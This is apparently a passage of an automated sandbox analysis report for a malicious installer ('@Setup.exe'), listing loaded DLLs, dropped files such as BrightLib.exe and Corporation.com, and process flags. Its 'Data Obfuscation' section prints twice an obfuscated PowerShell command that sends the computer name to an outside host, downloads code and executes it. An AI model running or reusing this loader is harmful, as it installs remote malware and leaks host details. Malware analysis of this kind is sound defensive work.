      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
      Source: C:\Users\user\Desktop\@Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpWindow found: window name: TMainForm
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: @Setup.exeStatic file information: File size 73409778 > 1048576
      Source: @Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2076653655.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2078181481.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2076153750.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe.12.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe.12.drStatic PE information: section name: .didata
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drStatic PE information: section name: .didata
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.drStatic PE information: section name: .didata
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_052B3655 push ebx; iretd 17_2_052B36DA

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-GC8MC.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeFile created: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeFile created: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
